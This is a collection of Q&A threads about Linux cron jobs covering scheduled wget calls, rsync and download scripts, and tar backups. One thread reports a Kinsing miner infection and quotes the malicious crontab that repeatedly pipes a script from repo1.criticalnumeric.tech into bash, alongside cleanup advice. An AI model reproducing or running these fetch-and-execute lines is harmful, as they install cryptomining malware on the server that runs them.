How to call a URL periodically from a Linux box (cron job)? - cron

I have a shell access on a Linux box where my Website resides.
I want to call a URL each hour on that website (it's not a specific PHP file; I use CodeIgniter as a framework and have some Apache redirects, so I really need to call a URL).
I guess I can use wget and crontab? How?

Add this to your crontab (if you use /etc/crontab instead, remember that its entries also need a user field before the command):
0 * * * * wget -O - -q -t 1 http://www.example.com/cron.php
Alternatively, create a shell script in /etc/cron.hourly:
File: wget
#!/bin/sh
wget -O - -q -t 1 http://www.example.com/cron.php
Make sure you chmod +x wget (or whatever filename you picked).

Related

Does somebody know about this: repo1.criticalnumeric.tech

I found a crontab on the company server that runs with this code:
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?time=1612899272" | bash;wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -o /dev/null -O - | bash;busybox wget "http://repo1.criticalnumeric.tech/kworker?time=1612899272" -q -O - | bash
If you go to that URL it reads:
"This is official page of repository linux"
This is weird; none of our engineers added this to the crontab, which makes me think it could be an attack.
Any thoughts?
If your server is hosting a web application built with the Laravel framework and debug mode is turned on, you are probably suffering from a recent RCE (Remote Code Execution) exploit.
Blogpost about technical details of the bug: https://www.ambionics.io/blog/laravel-debug-rce
CVE: https://nvd.nist.gov/vuln/detail/CVE-2021-3129
My professional recommendation: never run your application with debug mode enabled in production.
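In Laravel that comes down to two lines in the production .env file (a minimal sketch of a standard setup; remember to clear the cached config afterwards with php artisan config:clear):
APP_ENV=production
APP_DEBUG=false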
The Kinsing malware is responsible for this attack; it takes control of the crontab to keep the server infected. I have dealt with this attack, and for me the only way to clean the server was to back up all the important data and reinstall from scratch. I followed every recipe and nothing worked to stop it. The most important thing with this attack is to change the permissions on the crontab file so the malware cannot overwrite it.
Another important thing is to check the permissions of the infected user's .ssh directory, because the malware changes them to prevent logins with SSH keys; you must restore the original permissions to regain access.
Search for the kdevtmpfsi executable somewhere under /var/tmp, delete it, and create a dummy file with the same name with permissions set to 000. This is not a cure, but it buys time to take the backup.
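As a rough sketch of those containment steps (the www-data user, home directory and binary path are assumptions based on the reports in this thread; the chattr immutable flag is one way to keep the crontab from being rewritten, which goes a bit further than plain permissions):
# lock the infected user's crontab so the malware cannot rewrite it
chattr +i /var/spool/cron/crontabs/www-data
# restore sane permissions on the infected user's .ssh so key logins work again
chmod 700 /home/someuser/.ssh
chmod 600 /home/someuser/.ssh/authorized_keys
# neutralise the miner binary: remove it and plant an unusable placeholder
rm -f /var/tmp/kdevtmpfsi
touch /var/tmp/kdevtmpfsi
chmod 000 /var/tmp/kdevtmpfsi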
I think it is related to the issue in the link below. I saw similar entries in the output of a ps aux command on one of our servers. If you are unlucky, you will find that kdevtmpfsi is now hogging all of your CPU.
kdevtmpfsi - how to find and delete that miner
We had the same attack on Saturday, Feb 13. I changed the permissions on the crontab directory so that only root has rwx. Before that, we killed all www-data processes with "killall -u www-data -9"; so far no other instance of the offending process... will keep monitoring. We also disabled curl because we didn't need it.
I'm having the same problem on a Debian 10 server.
I checked with htop and found these:
curl -kL http://repo1.criticalnumeric.tech/scripts/cnc/install?time=1613422342
and
bash /tmp/.ssh-www-data/kswapd4
Both under the www-data user. Those processes were using up all the resources (CPU and memory).
I found something strange in the www-data crontab:
root@***:/var/www# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/tmp.eK8YZtGlIC/.sync.log installed on Mon Feb 15 23:27:41 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
#reboot curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
https://pastebin.com/Q049ZZtW
I think I have to reinstall Debian 10 on my server... or is there a way to clean it?

crontab bash script not running

I updated the script with the absolute paths. Also here is my current cronjob entry.
I went and fixed the SSH key issue, so I know that works now, but I might still need to tell rsync which key to use.
The script runs fine when called manually by the user. It looks like not even the rm commands are being executed by the cron job.
UPDATE
I updated my script, but it's basically the same as the one below. Below I have a new cron time and added error output.
I get nothing. It looks like the script doesn't even run.
crontab -e
35 0 * * * /bin/bash /x/y/z/s/script.sh > /tmp/tc.log 2>&1
#!/bin/bash
# Clean up
/bin/rm -rf /z/y/z/a/b/current/*
cd /z/y/z/a/to/
/bin/rm -rf ?s??/D????
cd /z/y/z/s/
# Find the latest file
FILE=`/usr/bin/ssh user@server /bin/ls -ht /x/y/z/t/a/ | /usr/bin/head -n 1`
# Copy over the latest archive and place it in the proper directory
/usr/bin/rsync -avz -e /usr/bin/ssh user@server:"/x/y/z/t/a/$FILE" /x/y/z/t/a/
# Unzip the zip file and place it in the proper directory
/usr/bin/unzip -o /x/y/z/t/a/$FILE -d /x/y/z/t/a/current/
# Run Dev's script
cd /x/y/z/t/
./old.py a/current/ t/ 5
Thanks for the help.
I figured it out: I'm used to working in CST and the server was in GMT. Thanks everybody for the help.
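For anyone hitting the same thing: before picking a schedule, check which timezone cron will use on the server. A quick check (timedatectl only exists on systemd-based distros; date works everywhere):
date          # prints the server's local time, including the zone abbreviation
timedatectl   # on systemd distros, shows the configured "Time zone"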

cron-job linux apache ssl

I have a server with Apache2 and Drupal 6 installed. On this server I have installed a module which needs to use cron. I also have an SSL certificate installed.
In my crontab I have this configuration:
* * * * * wget -O --q -t 1 http://domain:8280/folder/cron.php
* * * * * wget --no-check-certificate -O --q -t 1 https://domain/folder/cron.php
My server works, but if I add this configuration to my sites-enabled/000-default:
redirect permanent / https://domain/
my cron-driven module stops working. This is the error in syslog:
grandchild #20349 failed with status 5
I need to redirect my traffic from http to https.
First, make sure your redirect directive in 000-default.conf is correct (see the Apache wiki for details) and doesn't interfere with the configuration in the .htaccess file, if there is one.
Then fix your crontab this way:
Remove the first line, as you don't need plain HTTP anymore.
Change the second line to this:
wget --no-check-certificate -O /dev/null --quiet -t 1 https://domain/folder/cron.php
wget's -O option requires a path to a file, so either specify one or just point it at /dev/null. Also, the abbreviated --q you used is treated as ambiguous by some versions of wget, so it's better to use --quiet to suppress output instead.
Sometimes you may want to put your rather long command into a shell script file, make it executable (chmod +x your-script.sh) and make sure it does exactly what you want when run as the web server's user (sudo -u www-data /path/to/your-script.sh, then check whether it did the trick for your Drupal module). Then use the path to that script in the crontab. That will ensure everything works like a charm and keep your crontab neat and valid.
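For example, such a wrapper could be as small as this (the script location is just an example; the URL and wget options are the ones from this answer):
#!/bin/sh
# /usr/local/bin/drupal-cron.sh -- hit the Drupal cron URL quietly
wget --no-check-certificate -O /dev/null --quiet -t 1 https://domain/folder/cron.php
and the crontab entry then shrinks to:
* * * * * /usr/local/bin/drupal-cron.sh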

Script to download a web page

I set up a web server to show my page locally, because it is located in a place with a poor connection, so what I want to do is download the page content and replace the old one. I made this script to run in the background, but I am not very sure it will work 24/7 (the 2m is just to test it; I want it to wait 6-12 hrs). So, what do you think about this script? Is it insecure, or is it enough for what I am doing? Thanks.
#!/bin/bash
a=1;
while [ $a -eq 1 ]
do
echo "Starting..."
sudo wget http://www.example.com/web.zip --output-document=/var/www/content.zip
sudo unzip -o /var/www/content.zip -d /var/www/
sleep 2m
done
exit
UPDATE: This is the code I use now:
(It's just a prototype, but I intend to stop using sudo)
#!/bin/bash
a=1;
echo "Start"
while [ $a -eq 1 ]
do
echo "Searching flag.txt"
if [ -e flag.txt ]; then
echo "Flag found, and erasing it"
sudo rm flag.txt
if [ -e /var/www/content.zip ]; then
echo "Erasing old content file"
sudo rm /var/www/content.zip
fi
echo "Downloading new content"
sudo wget ftp://user:password@xx.xx.xx.xx/content/newcontent.zip --output-document=/var/www/content.zip
sudo unzip -o /var/www/content.zip -d /var/www/
echo "Erasing flag.txt from ftp"
sudo ftp -nv < erase.txt
sleep 5s
else
echo "Downloading flag.txt"
sudo wget ftp://user:password@xx.xx.xx.xx/content/flag.txt
sleep 5s
fi
echo "Waiting..."
sleep 20s
done
exit 0
erase.txt
open xx.xx.xx.xx
user user password
cd content
delete flag.txt
bye
I would suggest setting up a cron job; this is much more reliable than a script with huge sleeps.
Brief instructions:
If you have write permissions for /var/www/, simply put the downloading in your personal crontab.
Run crontab -e, paste this content, save and exit from the editor:
17 4,16 * * * wget http://www.example.com/web.zip --output-document=/var/www/content.zip && unzip -o /var/www/content.zip -d /var/www/
Or you can run the downloading from system crontab.
Create the file /etc/cron.d/download-my-site and place this content into it:
17 4,16 * * * <USERNAME> wget http://www.example.com/web.zip --output-document=/var/www/content.zip && unzip -o /var/www/content.zip -d /var/www/
Replace <USERNAME> with a login that has suitable permissions for /var/www.
Or you can put all the necessary commands into single shell script like this:
#!/bin/sh
wget http://www.example.com/web.zip --output-document=/var/www/content.zip
unzip -o /var/www/content.zip -d /var/www/
and invoke it from crontab:
17 4,16 * * * /path/to/my/downloading/script.sh
This task will run twice a day: at 4:17 and 16:17. You can set another schedule if you'd like.
More on cron jobs, crontabs etc:
Add jobs into cron
CronHowto on Ubuntu
Cron(Wikipedia)
Simply unzipping the new version of your content on top of the old one may not be the best solution. What if you remove a file from your site? The local copy will still have it. Also, with a zip-based solution, you're copying EVERY file each time, not just the files that have changed.
I recommend you use rsync instead, to synchronize your site content.
If you set your local documentroot to something like /var/www/mysite/, an alternative script might then look something like this:
#!/usr/bin/env bash
logtag="`basename $0`[$$]"
logger -t "$logtag" "start"
# Build an array of options for rsync
#
declare -a ropts
ropts=("-a")
ropts+=(--no-perms --no-owner --no-group)
ropts+=(--omit-dir-times)
ropts+=("--exclude ._*")
ropts+=("--exclude .DS_Store")
# Determine previous version
#
if [ -L /var/www/mysite ]; then
linkdest="$(stat -c"%N" /var/www/mysite)"
linkdest="${linkdest##*\`}"
ropts+=("--link-dest '${linkdest%'}'")
fi
now="$(date '+%Y%m%d-%H:%M:%S')"
# Only refresh our copy if flag.txt exists
#
statuscode=$(curl --silent --output /dev/stderr --write-out "%{http_code}" http://www.example.com/flag.txt)
if [ ! "$statuscode" = 200 ]; then
logger -t "$logtag" "no update required"
exit 0
fi
if ! rsync "${ropts[@]}" user@remoteserver:/var/www/mysite/ /var/www/"$now"; then
logger -t "$logtag" "rsync failed ($now)"
exit 1
fi
# Everything is fine, so update the symbolic link and remove the flag.
#
ln -sfn /var/www/"$now" /var/www/mysite
ssh user@remoteserver rm -f /var/www/flag.txt
logger -t "$logtag" "done"
This script uses a few external tools that you may need to install if they're not already on your system:
rsync, which you've already read about,
curl, which could be replaced with wget, but I prefer curl
logger, which is probably already installed on your system along with syslog or rsyslog, or may be part of the util-linux package, depending on your Linux distro.
rsync provides a lot of useful functionality. In particular:
it tries to copy only what has changed, so that you don't waste bandwidth on files that are the same,
the --link-dest option lets you refer to previous directories to create "links" to files that have not changed, so that you can have multiple copies of your directory with only single copies of unchanged files.
To make this work, both the rsync part and the ssh part, you will need to set up SSH keys that allow you to connect without being prompted for a password. That's not hard, but if you don't already know about it, it's the topic of a different question, or a quick search with your favourite search engine.
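If you haven't set that up before, the usual two steps look roughly like this (the key type and host name are only examples):
ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519   # generate a key pair; leave the passphrase empty for unattended cron use
ssh-copy-id user@remoteserver                # install the public key on the remote host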
You can run this from a crontab every 5 minutes:
*/5 * * * * /path/to/thisscript
If you want to run it more frequently, note that the "traffic" you will be using for every check that does not involve an update is an HTTP GET of the flag.txt file.

tar archiving via cron does not work

I am trying to archive my localhost's root folder with tar and want to automate the backup on a daily basis with crontab. For this purpose, I created a 'backupfolder' in my home directory. I am running Ubuntu 12.04.
The execution of tar in the command line works fine without problems:
sudo tar -cvpzf backupfolder/localhost.tar.gz /var/www
However, when I schedule the command for a daily backup (let's say at 17:00) in sudo crontab -e, it does not execute, i.e. the backup is not updated, using the following command:
0 17 * * * sudo tar -cpzf backupfolder/localhost.tar.gz /var/www
I already tried the full path /home/user/backupfolder/localhost.tar.gz without success.
/var/log/syslog gives me the following output for the scheduled execution:
Feb 2 17:00:01 DESKTOP-PC CRON[12052]: (root) CMD (sudo tar -cpzfbackupfolder/localhost.tar.gz /var/www)
Feb 2 17:00:01 DESKTOP-PC CRON[12051]: (CRON) info (No MTA installed, discarding output)
/etc/crontab specifies the following path:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
I assume that crontab is not executing it because it is a sudo command.
Is there a way to get this running? What is the recommended, safe way if I don't want to hardcode my root password?
Well, the command that works for you is
sudo tar -cvpzf backupfolder/localhost.tar.gz /var/www
This means you have to run the command with sudo access, so it will not work from within your own crontab.
I would suggest adding the cron job to the root user's crontab.
Basically, do
sudo crontab -e
And add an entry there
0 17 * * * cd /home/user/backupfolder && tar -cpzf localhost.tar.gz /var/www
If that doesn't work, add the full path of tar (like /bin/tar).
Also, while debugging, set the cronjob to run every minute (* * * * *)
Basically, the problem is the sudo command, so we will allow sudo to run tar for the user without prompting for a password.
Add the following line in /etc/sudoers file.
user ALL=(ALL) NOPASSWD:/bin/tar
where user is the user installing the crontab.
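With that sudoers rule in place, the user's own crontab can call sudo tar directly, for example (same paths as in the question):
0 17 * * * sudo /bin/tar -cpzf /home/user/backupfolder/localhost.tar.gz /var/www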
I suspect a PATH problem; try setting some variables at the top of sudo crontab -e:
# MAILTO gets you the output if there are errors
MAILTO=your_email@domain.tld
PATH=/usr/bin:/bin:/usr/local/bin:/usr/local/sbin:/sbin
You can write your command in a script like run.sh
#!/bin/sh -l
tar -cvpzf backupfolder/localhost.tar.gz /var/www
then use the crontab to run the script.
IMPORTANT NOTE: the script's first line uses the "-l" option, so the shell runs as a login shell and picks up your usual environment.
Try it.
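For completeness, the matching crontab entry would be something like this (the script location is a placeholder):
0 17 * * * /home/user/run.sh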
